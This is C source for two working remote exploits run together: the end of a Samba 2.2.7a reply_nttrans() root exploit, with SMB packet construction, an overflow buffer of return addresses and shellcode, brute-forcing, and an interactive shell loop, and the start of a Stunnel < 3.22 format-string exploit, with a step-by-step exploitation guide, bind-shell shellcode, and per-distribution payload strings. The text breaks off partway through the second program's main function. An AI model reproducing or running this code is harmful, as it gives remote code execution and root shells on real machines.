  char packet[sizeof (struct nbt_session_header) + (34 * 2)];

  construct_nbt_session_header(packet, SMB_SESSIONREQ, 0, sizeof (packet) - sizeof (struct nbt_session_header));

  tconx_servername = servername;

  sn = netbios_encode_name(servername, 0x20);

  cn = netbios_encode_name(clientname, 0x00);

  memcpy(packet + sizeof (struct nbt_session_header), sn, 34);

  memcpy(packet + (sizeof (struct nbt_session_header) + 34), cn, 34);

  if (write(fd, packet, sizeof (packet)) == -1)

  { close(fd);

    fprintf(stderr, "write() failed, reason: '%s' (code %i)\n", strerror(errno), errno); 

    exit(-errno);

  }

  free(cn);

  free(sn);

}

// netjes verwerken, zoals het hoort.

void process_nbt_session_reply(int fd)

{ struct nbt_session_header nbt_hdr;

  char *errormsg;

  uint8 errorcode;

  int size, len = 0;

  if ((size = read(fd, &nbt_hdr, sizeof (nbt_hdr))) == -1)

  { close(fd);

    fprintf(stderr, "read() failed, reason: '%s' (code %i)\n", strerror(errno), errno); 

    exit(-errno);

  }

  if (size != sizeof (nbt_hdr))

  { close(fd);

    fprintf(stderr, "read() a broken packet, aborting.\n"); 

    exit(-1);

  }

  memcpy(&len, &nbt_hdr.len, sizeof (uint16));

  if (len)

  { read(fd, (void *)&errorcode, 1); 

    close(fd);

    switch (errorcode)

    { case 0x80 : errormsg = "Not listening on called name"; break;

      case 0x81 : errormsg = "Not listening for calling name"; break;

      case 0x82 : errormsg = "Called name not present"; break;

      case 0x83 : errormsg = "Called name present, but insufficient resources"; break;

      case 0x8f : errormsg = "Unspecified error"; break;

      default : errormsg = "Unspecified error (unknown error code received!)"; break;

    }

    fprintf(stderr, "session request denied, reason: '%s' (code %i)\n", errormsg, errorcode);

    exit(-1);

  }

  printf("session request granted\n");

}

void negprot_request(int fd)

{ struct variable_data_header data;

  char dialects[] = "\x2PC NETWORK PROGRAM 1.0\x0\x2MICROSOFT NETWORKS 1.03\x0\x2MICROSOFT NETWORKS 3.0\x0\x2LANMAN1.0\x0" \

    "\x2LM1.2X002\x0\x2Samba\x0\x2NT LANMAN 1.0\x0\x2NT LM 0.12\x0\x2""FLATLINE'S KWAADWAAR";  

  char packet[sizeof (struct nbt_session_header) + sizeof (struct smb_base_header) + sizeof (data) + sizeof (dialects)];

  int dlen = htons(sizeof (dialects));

  memset(&data, '\0', sizeof (data));

  construct_nbt_session_header(packet, SMB_SESSION, 0, sizeof (packet) - sizeof (struct nbt_session_header));

  pid = getpid();

  construct_smb_base_header(packet + sizeof (struct nbt_session_header), SMB_NEGPROT, 8, 1, 0, pid, 0, 1);

  memcpy(&data.bytecount, &dlen, sizeof (uint16));

  memcpy(packet + (sizeof (struct nbt_session_header) + sizeof (struct smb_base_header)), &data, sizeof (data));

  memcpy(packet + (sizeof (struct nbt_session_header) + sizeof (struct smb_base_header) + sizeof (data)), 

    dialects, sizeof (dialects));

  if (write(fd, packet, sizeof (packet)) == -1)

  { close(fd);

    fprintf(stderr, "write() failed, reason: '%s' (code %i)\n", strerror(errno), errno); 

    exit(-errno);

  }

}

void process_negprot_reply(int fd)

{ struct nbt_session_header *nbt_hdr;

  struct smb_base_header *base_hdr;

  struct negprot_reply_header *np_reply_hdr;

  char packet[1024];

  int size;

  uint16 pid_reply;

  nbt_hdr = (struct nbt_session_header *)packet;

  base_hdr = (struct smb_base_header *)(packet + sizeof (struct nbt_session_header));

  np_reply_hdr = (struct negprot_reply_header *)(packet + (sizeof (struct nbt_session_header) + 

    sizeof (struct smb_base_header)));

  if ((size = read(fd, packet, sizeof (packet))) == -1)

  { close(fd);

    fprintf(stderr, "read() failed, reason: '%s' (code %i)\n", strerror(errno), errno); 

    exit(-errno);

  }

  // bekijk het antwoord even vluchtig.

  memcpy(&pid_reply, &base_hdr->pid, sizeof (uint16));

  memcpy(&sessionid, &np_reply_hdr->sessionid, sizeof (uint32));

  if (base_hdr->command != SMB_NEGPROT || np_reply_hdr->wordcount != 17 || pid_reply != pid)

  { close(fd);

    fprintf(stderr, "protocol negotiation failed\n");

    exit(-1);

  }

  printf("protocol negotiation complete\n");

}

void sesssetupx_request(int fd)

{ uint8 data[] = "\x12\x0\x0\x0\x55\x6e\x69\x78\x00\x53\x61\x6d\x62\x61";

  char packet[sizeof (struct nbt_session_header) + sizeof (struct smb_base_header) + 

    sizeof (struct sesssetupx_request_header) + sizeof (data)];

  int size;

  construct_nbt_session_header(packet, SMB_SESSION, 0, sizeof (packet) - sizeof (struct nbt_session_header));

  construct_smb_base_header(packet + sizeof (struct nbt_session_header), SMB_SESSSETUPX, 8, 1, 0, pid, 0, 1);

  construct_sesssetupx_header(packet + sizeof (struct nbt_session_header) + sizeof (struct smb_base_header));

  memcpy(packet + sizeof (struct nbt_session_header) + sizeof (struct smb_base_header) + 

    sizeof (struct sesssetupx_request_header), &data, sizeof (data));

  if ((size = write(fd, packet, sizeof (packet))) == -1)

  { close(fd);

    fprintf(stderr, "write() failed, reason: '%s' (code %i)\n", strerror(errno), errno); 

    exit(-errno);

  }

  if (size != sizeof (packet))

  { close(fd);

    fprintf(stderr, "couldn't write entire packet, aborting!\n");

    exit(-1);

  }

}

void process_sesssetupx_reply(int fd)

{ struct nbt_session_header *nbt_hdr;

  struct smb_base_header *base_hdr;

  struct sesssetupx_reply_header *sx_hdr;

  char packet[1024];

  int size, len;

// lees het packet

  if ((size = read(fd, packet, sizeof (packet))) == -1)

  { close(fd);

    fprintf(stderr, "read() failed, reason: '%s' (code %i)\n", strerror(errno), errno); 

    exit(-errno);

  }

  nbt_hdr = (struct nbt_session_header *)packet;

  base_hdr = (struct smb_base_header *)(packet + sizeof (struct nbt_session_header));

  sx_hdr = (struct sesssetupx_reply_header *)(packet + sizeof (struct nbt_session_header) + sizeof (struct smb_base_header));

  memcpy(&len, &nbt_hdr->len, sizeof (uint16));

  memcpy(&uid, &base_hdr->uid, sizeof (uint16));

// even een vluchtige check

  if (sx_hdr->xcommand != 0xff && sx_hdr->wordcount != 3)

  { close(fd);

    fprintf(stderr, "session setup failed\n");

    exit(-1);

  }

  printf("session setup complete, got assigned uid %i\n", uid);

}

void tconx_request(int fd)

{ // geen fixed size buffer omdat we met dynamische data te maken hebben (variabele servernaam)

  char *packet;

  int size, pktsize = sizeof (struct nbt_session_header) + sizeof (struct smb_base_header) +

    sizeof (struct tconx_request_header) + strlen(tconx_servername) + 15;

  if ((packet = malloc(pktsize)) == NULL)

  { close(fd);

    fprintf(stderr, "malloc() failed, aborting!\n");

    exit(-1);

  }

  construct_nbt_session_header(packet, SMB_SESSION, 0, pktsize - sizeof (struct nbt_session_header));

  construct_smb_base_header(packet + sizeof (struct nbt_session_header), SMB_TCONX, 8, 1, 0, pid, uid, 1);

  construct_tconx_header(packet + sizeof (struct nbt_session_header) + sizeof (struct smb_base_header));

  if ((size = write(fd, packet, pktsize)) == -1)

  { close(fd);

    fprintf(stderr, "write() failed, reason: '%s' (code %i)\n", strerror(errno), errno); 

    exit(-errno);

  }

  free(packet);

  if (size != pktsize)

  { close(fd);

    fprintf(stderr, "couldn't write entire packet, aborting!\n");

    exit(-1);

  }  

}

void process_tconx_reply(int fd)

{ struct nbt_session_header *nbt_hdr;

  struct smb_base_header *base_hdr;

  struct tconx_reply_header *tx_hdr;

  char packet[1024];

  int size, bytecount;

// lees het packet

  if ((size = read(fd, packet, sizeof (packet))) == -1)

  { close(fd);

    fprintf(stderr, "read() failed, reason: '%s' (code %i)\n", strerror(errno), errno);

    exit(-errno);

  }

  nbt_hdr = (struct nbt_session_header *)packet;

  base_hdr = (struct smb_base_header *)(packet + sizeof (struct nbt_session_header));

  tx_hdr = (struct tconx_reply_header *)(packet + sizeof (struct nbt_session_header) + sizeof (struct smb_base_header));

  memcpy(&tid, &base_hdr->tid, sizeof (uint16));

  memcpy(&bytecount, &tx_hdr->bytecount, sizeof (uint16));

  printf("tree connect complete, got assigned tid %i\n", tid);

}

void nttrans_primary_request(int fd)

{ char packet[sizeof (struct nbt_session_header) + sizeof (struct smb_base_header) + 

    sizeof (struct nttrans_primary_request_header)];

  struct nttrans_primary_request_header nt_hdr;

  int size, function = SMB_NTTRANSCREATE, totalparamcount = TOTALCOUNT, totaldatacount = 0;

  uint8 setupcount = 0;

  memset(&nt_hdr, '\0', sizeof (nt_hdr));

  construct_nbt_session_header(packet, SMB_SESSION, 0, sizeof (packet) - sizeof (struct nbt_session_header));

  construct_smb_base_header(packet + sizeof (struct nbt_session_header), SMB_NTTRANS1, 8, 1, tid, pid, uid, 1);

  nt_hdr.wordcount = 19 + setupcount;

  memcpy(&nt_hdr.function, &function, sizeof (uint16));

  memcpy(&nt_hdr.totalparamcount, &totalparamcount, sizeof (uint32));

  memcpy(&nt_hdr.totaldatacount, &totaldatacount, sizeof (uint32));

  memcpy(packet + sizeof (struct nbt_session_header) + sizeof (struct smb_base_header), &nt_hdr, sizeof (nt_hdr));

  if ((size = write(fd, packet, sizeof (packet))) == -1)

  { close(fd);

    fprintf(stderr, "write() failed, reason: '%s' (code %i)\n", strerror(errno), errno); 

    exit(-errno);

  }

  if (size != sizeof (packet))

  { close(fd);

    fprintf(stderr, "couldn't write entire packet, aborting!\n");

    exit(-1);

  }  

}

// hier gaat het gebeuren.

/* 

struct nttrans_secondary_request_header

{ uint8 pad[3], totalparamcount[4], totaldatacount[4], paramcount[4], paramoffset[4], paramdisplace[4],

    datacount[4], dataoffset[4], datadisplace[4];

}; */

void nttrans_secondary_request(int fd)

{ char retbuf[TOTALCOUNT], packet[sizeof (struct nbt_session_header) + sizeof (struct smb_base_header) +

    sizeof (struct nttrans_secondary_request_header) + TOTALCOUNT];

  struct nttrans_secondary_request_header nt_hdr;

  unsigned long retaddr, jmptocode = 0x9090a1eb; // jmptocode = 0x90909ceb;

  int i;

  int size, totalparamcount = TOTALCOUNT, totaldatacount = 0,   

    paramcount = TOTALCOUNT, datacount = 0, paramdisplace = STACKBASE - PARAMBASE,

    datadisplace = 0, paramoffset = 68, dataoffset = 0;

  memset(&nt_hdr, '\0', sizeof (nt_hdr));

  retaddr = 0xbffff6eb;

  for (i = 0; i < TOTALCOUNT; i += 4) 

  { if (i == 0x100)

    { memcpy(retbuf + i, &jmptocode, 4);

    }

    else memcpy(retbuf + i, &retaddr, 4);

  }

//  memset(shellcode, 0xCC, sizeof (shellcode));

  memcpy(retbuf + 0x100 - sizeof (shellcode), shellcode, sizeof (shellcode));

  printf("sizeof packet: %i, parambase: 0x%08lx\n", sizeof (packet), PARAMBASE);

  construct_nbt_session_header(packet, SMB_SESSION, 0, sizeof (packet) - sizeof (struct nbt_session_header));

  construct_smb_base_header(packet + sizeof (struct nbt_session_header), SMB_NTTRANS2, 8, 1, tid, pid, uid, 1);

  memcpy(&nt_hdr.totalparamcount, &totalparamcount, sizeof (uint32));

  memcpy(&nt_hdr.totaldatacount, &totaldatacount, sizeof (uint32));

  memcpy(&nt_hdr.paramcount, &paramcount, sizeof (uint32));

  memcpy(&nt_hdr.datacount, &datacount, sizeof (uint32));

  memcpy(&nt_hdr.paramdisplace, &paramdisplace, sizeof (uint32));

  memcpy(&nt_hdr.datadisplace, &datadisplace, sizeof (uint32));

  memcpy(&nt_hdr.paramoffset, &paramoffset, sizeof (uint32));

  memcpy(&nt_hdr.dataoffset, &dataoffset, sizeof (uint32));

  memcpy(packet + sizeof (struct nbt_session_header) + sizeof (struct smb_base_header), &nt_hdr, sizeof (nt_hdr));

  memcpy(packet + sizeof (struct nbt_session_header) + sizeof (struct smb_base_header) + sizeof (nt_hdr), retbuf, sizeof (retbuf));

  usleep(5000);

  if ((size = write(fd, packet, sizeof (packet))) == -1)

  { close(fd);  

    fprintf(stderr, "write() failed, reason: '%s' (code %i)\n", strerror(errno), errno);

    exit(-errno);

  }

  if (size != sizeof (packet))

  { close(fd);

    fprintf(stderr, "couldn't write entire packet, aborting!\n");

    exit(-1);

  }

  fprintf(stderr, "secondary nttrans packet sent!\n");

}

// voor alle idioten onder ons.

void usage(char *name)

{ printf("\nusage: %s -h hostname [-p port] -t target [-l]\n\n-h\tspecify target hostname\n-p\tspecify target " \

   "port (defaults to 139)\n-t\tspecify target's magic numbers\n-l\tshow list of targets\n\n", name);

}

void userbreak_handler(int x)

{ userbreak = 1;

}

int main(int argc, char **argv)

{ int fd, port = -1, opt, readlen;

  unsigned long target_ip;

  struct sockaddr_in s_in;

  struct hostent *he;

  char *host = NULL, *me, readbuf[4096];

  fd_set readfds;

  if (argc >= 1) 

  { me = argv[0];

    if (strchr(me, '/') != NULL) me = strrchr(me, '/') + 1;

  }

  else me = "sambash";

  fprintf(stderr, "\nsambash -- samba <= 2.2.7a reply_nttrans() linux x86 remote root exploit by flatline@blackhat.nl\n\n");

  while ((opt = getopt(argc, argv, "h:p:b:")) != EOF)

  { switch (opt)

    { case 'h': { if (!inet_aton(optarg, (struct in_addr *)&target_ip))

 { if ((he = gethostbyname(optarg)) == NULL)

   { fprintf(stderr, "unable to resolve host '%s', reason: %s (code %i)\n", optarg, hstrerror(h_errno), h_errno);

     exit(-h_errno);

   }

   memcpy((void *)&target_ip, he->h_addr_list[0], he->h_length);

         }

 host = optarg;

} break;

      case 'p': { port = atoi(optarg);

         if (port < 0 || port > 65535)

 { fprintf(stderr, "invalid port specified.\n");

   exit(-1);

 }

  } break;

      case 'b': PARAMBASE += atoi(optarg); break;

      default : { usage(me);

 exit(0);

} break;

    }

  }

  if (host == NULL)

  { fprintf(stderr, "no hostname specified.\n");

    usage(me);

    exit(-1);

  }

  if (port == -1) port = SMBD_PORT;

  signal(SIGINT, userbreak_handler);

  while (!userbreak)

  { memset(&s_in, 0, sizeof (s_in));

    s_in.sin_family = AF_INET;

    s_in.sin_port = htons(port);

    s_in.sin_addr.s_addr = target_ip;

    if ((fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1)

    { fprintf(stderr, "socket() failed, reason: '%s' (code %i)\n", strerror(errno), errno); 

      exit(-errno);

    }

    if (connect(fd, (struct sockaddr *)&s_in, sizeof (s_in)) == -1)

    { fprintf(stderr, "connect() to host '%s:%i' failed, reason: '%s' (code %i)\n", host, port, strerror(errno), errno); 

      exit(-errno);

    }

    // register name

    nbt_session_request(fd, "BOSSA", "SAMBA");

    process_nbt_session_reply(fd);

    // protocol negotiation

    negprot_request(fd);

    process_negprot_reply(fd);

    // session setup

    sesssetupx_request(fd);

    process_sesssetupx_reply(fd);

    // tree connection setup

    tconx_request(fd);

    process_tconx_reply(fd);

    // nttrans packet sturen

    nttrans_primary_request(fd);

    nttrans_secondary_request(fd);

    usleep(750000);

    if (close(fd) == -1)

    { fprintf(stderr, "close() failed, reason: '%s' (code %i)\n", strerror(errno), errno); 

      exit(-errno);

    }

    memset(&s_in, 0, sizeof (s_in));

    s_in.sin_family = AF_INET;

    s_in.sin_port = htons(SHELLCODE_PORT);

    s_in.sin_addr.s_addr = target_ip;

    if ((fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1)

    { fprintf(stderr, "socket() failed, reason: '%s' (code %i)\n", strerror(errno), errno); 

      exit(-errno);

    }

    if (connect(fd, (struct sockaddr *)&s_in, sizeof (s_in)) == -1)

    { if (close(fd) == -1)

      { fprintf(stderr, "close() failed, reason: '%s' (code %i)\n", strerror(errno), errno); 

        exit(-errno);

      }

      PARAMBASE += BRUTESTEP;

      continue;

    }

    printf("\n\n** veel plezier.\n\n");

    FD_ZERO(&readfds);

    while (!userbreak)

    { FD_SET(fileno(stdin), &readfds);

      FD_SET(fd, &readfds);

      if (select(fd + 1, &readfds, NULL, NULL, NULL) < 0)

      { fprintf(stderr, "shell loop aborted because of error code %i ('%s')\n", errno, strerror(errno));

        break;

      }

      if (FD_ISSET(fileno(stdin), &readfds))

      { int writelen;

        readlen = read(fileno(stdin), readbuf, sizeof (readbuf));

        if (readlen == -1)

        { fprintf(stderr, "read() failed with error code %i ('%s')\n", errno, strerror(errno));

          exit(-1);

        }

        if ((writelen = write(fd, readbuf, readlen)) == -1)

        { fprintf(stderr, "write() failed with error code %i ('%s')\n", errno, strerror(errno));

          exit(-1);

        }

        FD_ZERO(&readfds);

        continue;

      }

      if (FD_ISSET(fd, &readfds))

      { if ((readlen = read(fd, readbuf, sizeof (readbuf))) == -1)

        { fprintf(stderr, "shell loop aborted because of error code %i ('%s')\n", errno, strerror(errno));

          break;

        }

        write(fileno(stderr), readbuf, readlen);

        FD_ZERO(&readfds);   

        continue;

      }

    }

  }

  printf("user break.\n");

  signal(SIGINT, SIG_DFL);

  return 0;

}

/*

* Stunnel < 3.22 remote exploit

* by ^sq/w00nf - deltha [at] analog.ro

* Contact: deltha@analog.ro

* Webpage: http://www.w00nf.org/^sq/

*

* ey ./w00nf-stunnel contribs - kewlthanx :

* nesectio, wsxz, soletario, spacewalker, robin, luckyboy, hash, nobody, ac1d, and not @ the end: bajkero

*

* You also need netcat and format strings build utility (from my webpage)

* Compile: gcc -w -o w00nf-stunnel w00nf-stunnel.c

*

* . . .. ......................................... ...

* . ____ ____ _____ :.:.:

* : _ __/ __ \/ __ \____ / __/ :..

* :.. | | /| / / / / / / / / __ \/ /_ :

* ..:.. | |/ |/ / /_/ / /_/ / / / / __/ :

* :.: :.. |__/|__/\____/\____/_/ /_/_/ .

* : : :..

* :.: :............................................... .. . . 

* T . E . A . M 

* 

* POC - Tested remotely on linux 

* Stunnel is a program that allows you to encrypt arbitrary TCP connections inside SSL 

* Visit http://www.stunnel.org for details

*

* I didn't add a search function or bruteforce attack because the vulnerability does'nt allow you

* to grab the remote stack.

*

* Description of this exploit:

* This exploit puts a payload on a specified port. When a remote user connects to your machine 

* using stunnel on the specified port, the exploit executes this payload and binds a shell to the

* remote users machine on port 5074.

* 

* Summary: 

* Malicious servers could potentially run code as the owner of an Stunnel process when using 

* Stunnel's protocol negotiation feature in client mode. 

*

* Description of vulnerability: 

* Stunnel is an SSL wrapper able to act as an SSL client or server, 

* enabling non-SSL aware applications and servers to utilize SSL encryption. 

* In addition, Stunnel has the ability to perform as simple SSL encryption/decryption 

* engine. Stunnel can negotiate SSL with several other protocols, such as 

* SMTP's "STARTTLS" option, using the '-n protocolname' flag. Doing so 

* requires that Stunnel watches the initial protocol handshake before 

* beginning the SSL session. 

* There are format string bugs in each of the smtp, pop, and nntp 

* client negotiations as supplied with Stunnel versions 3.3 up to 3.21c. 

*

* No exploit is currently known, but the bugs are most likely exploitable. 

* 

* Impact: 

* If you use Stunnel with the '-n smtp', '-n pop', '-n nntp' options 

* in client mode ('-c'), a malicous server could abuse the format 

* string bug to run arbitrary code as the owner of the Stunnel 

* process. The user that runs Stunnel depends on how you start 

* Stunnel. It may or may not be root -- you will need to check 

* how you invoke Stunnel to be sure. 

* There is no vulnerability unless you are invoking Stunnel with 

* the '-n smtp', '-n pop', or '-n nntp' options in client mode. 

* There are no format string bugs in Stunnel when it is running as an SSL 

* server. 

*

* Mitigating factors: 

* If you start Stunnel as root but have it change userid to some other 

* user using the '-s username' option, the Stunnel process will be 

* running as 'username' instead of root when this bug is triggered. 

* If this is the case, the attacker can still trick your Stunnel process 

* into running code as 'username', but not as root. 

* Where possible, we suggest running Stunnel as a non-root user, either 

* using the '-s' option or starting it as a non-privileged user. 

*

* Triggering this vulnerability - example for kidz:

* Obtain a shell account on to-be-hacked's server and perform the following commands:

* sq@cal013102: whereis stunnel

* stunnel: /usr/sbin/stunnel

* change directory to where is stunnel

* Obtain vsnprintf's R_386_JUMP_SLOT:

* sq@cal013102:~/stunnel-3.20$ /usr/bin/objdump --dynamic-reloc ./stunnel |grep printf

* 08053470 R_386_JUMP_SLOT fprintf

* ---->080534a8 R_386_JUMP_SLOT vsnprintf

* 080535a4 R_386_JUMP_SLOT snprintf

* 08053620 R_386_JUMP_SLOT sprintf

* open 2 terminals

* in the first terminal make netcat connect to a port (eg 252525)

* sq@cal013102:~/stunnel-3.20$ nc -p 252525 -l 

* in the second terminal (remote) simulate attack 

* ./stunnel -c -n smtp -r localhost:252525

* in the first terminal with nc insert a specially crafted string to grep eatstack value

* AAAABBBB%x|%x|%x|%x|%x|%x|%x|%x|%x|%x|%x|%x|%x|%x|%x|%x|

* in the second terminal (remote) it will return the stack values and see at which position 

* 41414141 and 424242 appeared

* AAAABBBB|bffff868|bffffb60|bffffece|bffffed3|80503ae|40275580|4016bfc4|

* 4027f3c4|41414141|42424242|257c7825|78257c78|7c78257c|

* 257c7825|78257c78|7c78257c| ->414141=9 and 424242=10

* try again with to see if eatstack value is 9 AAAABBBB%9$x%10$x and it will return AAAABBBB4141414142424242

* put the address obtained with objdump in hex little endian format \xa8\x34\x05\x08 and last value +2 \xaa\x34\x05\x08

* (a8+2=aa) and generate the decimal value of format string after you got the middle of nops value on stack 0xbffff89b

* with build, a program attached to this exploit.

* ./build 080534a8 0xbffff89b 9

* adr : 134558888 (80534a8)

* val : -1073743717 (bffff89b)

* valh: 49151 (bfff)

* vall: 63643 (f89b)

* [ª¨%.49143x%9$hn%.14492x%10$hn] (35)

* ª¨%.49143x%9$hn%.14492x%10$hn

* The resulting string is %.49143x%9$hn%.14492x%10$hn -> 

* "'`%.32759u%9\$hn%.32197u%10\$hn replace eatstack 10 with 9 otherwise it won't work

* eg "'`%.32759u%10\$hn%.32197u%9\$hn

* Put the payload in a file echo `perl -e 'print "\xc4\x35\x05\x08\xc6\x35\x05\x08"'`%.32759u%10\$hn%.32197u%9\$hn > x

* Bind the payload to a port ./netcat -p 252525 -l <x

* Simulate the payload attack ./stunnel -c -n smtp -r localhost:252525

* Add your own crafted format in the exploit:

* char fmtDEBIAN30[]="\xa8\x34\x05\x08\xaa\x34\x05\x08%.49143x%10\$hn%.14492x%9\$hn"; 080534a8 vsnprintf

* char fmtYOUROWN[]=""; R_386_JUMP_SLOT vsnprintf 

* Simulate the payload attack with this exploit ./w00nf-stunnel -t 6 -p 252525 t6 would be your custom payload

* after you added your string in the exploit.

* If stunnel was compiled with gdb support and you set ulimit -c 9024 or whatever to coredump on your terminal

* then stunnel will coredump if you didn't guess the exact stackvalue in the middle of nops.

* If stunnel wasn't compiled with gdb support then download it from the stunnel website

* and compile with gdb support. 

* Once you have downloaded it run './configure edit Makefile' , and where you see 'CFLAGS' add '-g -ggdb3'

* eg. 'cat Makefile |grep CFLAGS'

* CFLAGS=-g -ggdb3 -O2 -Wall -I/usr/local/ssl/include -DVERSION=\"3.20\" -DHAVE_OPENSSL=1 -Dssldir=\"/usr/local/ssl\"

* -DPEM_DIR=\"\" -DRANDOM_FILE=\"/dev/urandom\" -DSSLLIB_CS=0 -DHOST=\"i586-pc-linux-gnu\" -DHAVE_LIBDL=1 

* DHAVE_LIBPTHREAD=1 -DHAVE_LIBUTIL=1 -DHAVE_LIBWRAP=1 etcetc

* Open core in gdb sq@cal013102:~/stunnel-3.20$gdb ./stunnel core.2411

* x/10i $esp and press enter a couple of times till you find 'nop nop nop nop nop nop'.

* Get the stack address in the middle of nops, 0xbffff89b is my address

* and build (9 is eatstack) again with the ./build utility

* Rebuild and repeat.

* ./build 080534a8 0xbffff89b 9

* Put the payload in a file echo `perl -e 'print "\xc4\x35\x05\x08\xc6\x35\x05\x08"'`%.32759u%10\$hn%.32197u%9\$hn > x

* ./w00nf-stunnel -t 6 -p 252525 t6 is your custom payload and it will bind a shell on 5074 :)

* If it worked then add your own crafted format in the exploit

* char fmtDEBIAN30[]="\xa8\x34\x05\x08\xaa\x34\x05\x08%.49143x%10\$hn%.14492x%9\$hn"; 080534a8 vsnprintf

* char fmtYOUROWN[]="\xa8\x34\x05\x08\xaa\x34\x05\x08%.49143x%10\$hn%.14492x%9\$hn"; R_386_JUMP_SLOT vsnprintf 

*

*/

#include <fcntl.h>

#include <netdb.h>

#include <sys/stat.h>

#include <sys/types.h>

#include <unistd.h>

#include <stdio.h>

#include <string.h>

#include <getopt.h>

#include <stdlib.h>

#include <memory.h>

#include <errno.h>

#include <syslog.h>

int MAX;

char linuxshellcode[] =

/* <priv8security>: bind@5074 */

"\x90\x90\x90\x90\x90" /* nop */

"\x90\x90\x90\x90\x90" /* nop */

"\x90\x90\x90\x90\x90" /* nop */

"\x90\x90\x90\x90\x90" /* nop */

"\x90\x90\x90\x90\x90" /* nop */

"\x90\x90\x90\x90\x90" /* nop */

"\x90\x90\x90\x90\x90" /* nop */

"\x90\x90\x90\x90\x90" /* nop */

"\x90\x90\x90\x90\x90" /* nop */

"\x90\x90\x90\x90\x90" /* nop */

"\x90\x90\x90\x90\x90" /* nop */

"\x90\x90\x90\x90\x90" /* nop */

"\x90\x90\x90\x90\x90" /* nop */

"\x90\x90\x90\x90\x90" /* nop */

"\x90\x90\x90\x90\x90\x90" /* nop */

"\x31\xc0" /* xor %eax,%eax */

"\x50" /* push %eax */

"\x40" /* inc %eax */

"\x89\xc3" /* mov %eax,%ebx */

"\x50" /* push %eax */

"\x40" /* inc %eax */

"\x50" /* push %eax */

"\x89\xe1" /* mov %esp,%ecx */

"\xb0\x66" /* mov $0x66,%al */

"\xcd\x80" /* int $0x80 */

"\x31\xd2" /* xor %edx,%edx */

"\x52" /* push %edx */

"\x66\x68\x13\xd2" /* pushw $0xd213 */

"\x43" /* inc %ebx */

"\x66\x53" /* push %bx */

"\x89\xe1" /* mov %esp,%ecx */

"\x6a\x10" /* push $0x10 */

"\x51" /* push %ecx */

"\x50" /* push %eax */

"\x89\xe1" /* mov %esp,%ecx */

"\xb0\x66" /* mov $0x66,%al */

"\xcd\x80" /* int $0x80 */

"\x40" /* inc %eax */

"\x89\x44\x24\x04" /* mov %eax,0x4(%esp,1) */

"\x43" /* inc %ebx */

"\x43" /* inc %ebx */

"\xb0\x66" /* mov $0x66,%al */

"\xcd\x80" /* int $0x80 */

"\x83\xc4\x0c" /* add $0xc,%esp */

"\x52" /* push %edx */

"\x52" /* push %edx */

"\x43" /* inc %ebx */

"\xb0\x66" /* mov $0x66,%al */

"\xcd\x80" /* int $0x80 */

"\x93" /* xchg %eax,%ebx */

"\x89\xd1" /* mov %edx,%ecx */

"\xb0\x3f" /* mov $0x3f,%al */

"\xcd\x80" /* int $0x80 */

"\x41" /* inc %ecx */

"\x80\xf9\x03" /* cmp $0x3,%cl */

"\x75\xf6" /* jne 80a035d <priv8security+0x3d> */

"\x52" /* push %edx */

"\x68\x6e\x2f\x73\x68" /* push $0x68732f6e */

"\x68\x2f\x2f\x62\x69" /* push $0x69622f2f */

"\x89\xe3" /* mov %esp,%ebx */

"\x52" /* push %edx */

"\x53" /* push %ebx */

"\x89\xe1" /* mov %esp,%ecx */

"\xb0\x0b" /* mov $0xb,%al */

"\xcd\x80"; /* int $0x80 */

char fmtRH72[]="\x50\x71\x05\x08\x52\x71\x05\x08%.49143x%4\$hn%.12881x%3\$hn"; /* 08057150 R_386_JUMP_SLOT vsnprintf */

char fmtRH73[]="\xe8\x69\x05\x08\xea\x69\x05\x08%.49143x%4\$hn%.12982x%3\$hn"; /* 080569e8 R_386_JUMP_SLOT vsnprintf */

char fmtRH80[]="\x28\x69\x05\x08\x2a\x69\x05\x08%.49143x%4\$hn%.12815x%3\$hn"; /* 08056928 R_386_JUMP_SLOT vsprintf */

char fmtMDK90[]="\xf8\x23\x05\x08\xfa\x23\x05\x08%.49143x%4\$hn%.13321x%3\$hn"; /* 080523f8 R_386_JUMP_SLOT vsnprintf */

char fmtSLACK81[]="\xdc\x69\x05\x08\xde\x69\x05\x08%.49143x%10\$hn%.12082x%9\$hn"; /* 080569dc R_386_JUMP_SLOT vsnprintf */

char fmtDEBIAN30[]="\xa8\x34\x05\x08\xaa\x34\x05\x08%.49143x%10\$hn%.14492x%9\$hn"; /* 080534a8 R_386_JUMP_SLOT vsnprintf */

char fmtYOUROWN[]=""; /* R_386_JUMP_SLOT vsnprintf */

char c;

struct os {

int num;

char *ost;

char *shellcode;

char *format;

int flag;

};

struct os plat[] =

{

{

0,"Red Hat Linux release 7.2 stunnel-3.20.tar.gz",

linuxshellcode,fmtRH72,11

},

{

1,"Red Hat Linux release 7.3 stunnel-3.20.tar.gz",

linuxshellcode,fmtRH73,11

},

{

2,"Red Hat Linux release 8.0 stunnel-3.20.tar.gz",

linuxshellcode,fmtRH80,11

},

{

3,"Mandrake Linux release 9.0 stunnel-3.20.tar.gz",

linuxshellcode,fmtMDK90,11

},

{

4,"Slackware Linux release 8.1 stunnel-3.20.tar.gz",

linuxshellcode,fmtSLACK81,5

},

{

5,"Debian GNU release 3.0 stunnel-3.20.tar.bz2",

linuxshellcode,fmtDEBIAN30,5

},

{

6,"Your custom distro stunnel-3.20.tar.bz2",

linuxshellcode,fmtYOUROWN,5

}

};

void usage(char *argument);

int main(argc,argv)

int argc;

char *argv[];

{

int type=0;

int flag=plat[type].flag;

extern char *optarg;

int cnt;

char newstring[300];

int port = 994;

const char* sploitdata_filename = "sploitdata.spl"; 

static int fd[2];

static pid_t childpid;

static char str_port[6];

void write_sploit_data (char* entry)

{

int fd = open (sploitdata_filename, O_WRONLY | O_CREAT | O_APPEND, 0660);

write (fd, entry, strlen (entry));

write (fd, "\n", 1);

fsync (fd);

close (fd);

}

if(argc == 1) 

usage(argv[0]);

if(argc == 2) 

usage(argv[0]);

if(argc == 3) 

usage(argv[0]);

while ((c = getopt(argc, argv, "h:p:t:v")) > 0 ){

switch (c) {

case 't':

type = atoi(optarg);

if(type>6) /* 0,1,2,3,4,5,6 */

{

(void)usage(argv[0]);

}

break;

case 'p':

port = atoi(optarg);

break;

case 'h':

usage(argv[0]);

case '?':

case ':':

exit(-1);

}

}

MAX=strlen(plat[type].format)+strlen(plat[type].shellcode);

fprintf(stdout,"Remote exploit for STUNNEL <3.22\nby ^sq/w00nf - deltha [at] analog.ro\n");

fprintf(stdout,"[*] target: %s\n",plat[type].ost);

fprintf(stdout,"[*] maxlenght: %d\n", MAX);

